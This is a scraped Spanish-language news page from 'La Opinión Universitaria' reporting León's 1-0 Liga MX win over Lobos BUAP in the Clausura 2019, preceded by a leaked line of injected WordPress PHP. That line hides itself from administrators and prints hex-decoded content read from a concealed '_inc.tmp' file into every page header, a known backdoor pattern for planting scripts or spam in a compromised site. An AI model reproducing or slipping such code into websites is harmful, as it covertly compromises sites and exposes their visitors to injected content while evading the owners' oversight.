if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } León derrotó a Lobos – La Opinión Universitaria La Opinión Universitaria
Menu

León derrotó a Lobos

*Los Esmeraldas se impusieron 1-0 en el Universitario BUAP

Con gol de Luis Montes, León derrotó 1-0 a Lobos en la cancha del estadio Universitario BUAP, en actividad de la jornada 10 del torneo Clausura 2019 de la Liga MX.

Los Esmeraldas acumularon 23 puntos y están en la cabeza de la competencia; el equipo Universitario se quedó en el lugar 12 con 13 unidades.

En los primeros momentos del encuentro los de la BUAP tocaron la puerta con disparos de media distancia. Al minuto 15, fue Mauro Lainez quien recibió un balón en la media luna y remató de volea. El guardameta Rodolfo Cota, quien estaba ligeramente adelantado, recorrió para atrás y se lanzó para evitar la anotación.

Al 23’, el mismo Cota fildeó mal un tiro de esquina lo que permitió a José Esquivel rematar de cabeza, desafortunadamente el balón se fue por un costado.

Cuando mejor jugaban los universitarios, “La fiera” sacó el colmillo y se fue al . frente en la pizarra. Ángel Mena desbordó por banda derecha y puso un centro a Luis Montes, quien de cabeza remató a contrapié de Toño Rodríguez para adelantar a los suyos. Todo esto a los 26’.

Lobos intentó reponerse de dicha anotación mientras que los de León fueron precavidos y apostaron a marcar en jugada de contragolpe. No obstante, el electrónico no sufrió más movimientos y el partido se fue el medio tiempo con la mínima ventaja para los visitantes.

En la reanudación, León apretó en ofensiva y al 48’, sorprendieron en una jugada prefabricada que dejó sólo a Luis Montes, cuando el atacante leonés se disponía a definir se resbaló y no pudo rematar a placer, permitiendo a Antonio Rodríguez rechazar el peligro. Cinco minutos más adelante Jean Meneses alcanzó un pase filtrado para rematar de zurda, pero el guardameta universitario achicó a la perfección y salvó su meta.

En jugada posterior Joel Campbell consiguió marcar con remate de primera, pero el VAR anuló la acción porque en el pase previo el esférico abandonó la cancha por línea de fondo.

La manada respondió al minuto 67 con centro cabeceado por Luiz Da Silva, pero el esférico fue directo a las manos de Rodolfo Cota.

Los Panzas Verdes no dejaban de ser peligrosos y al 75’, José Macías quedó en otro mano a mano contra el arquero Rodríguez quien nuevamente salió airoso y envió a tiro de esquina.

En la recta final del juego, la visita retrasó a sus hombres para preservar su ventaja y Paco Palencia buscó el empate incorporando a Yago Da Silva y a Rafael Durán.

Para la Jornada 11 de la LIGA MX los licántropos visitarán a Monarcas en el estadio Morelos y León recibirá a Veracruz en el Nou Camp.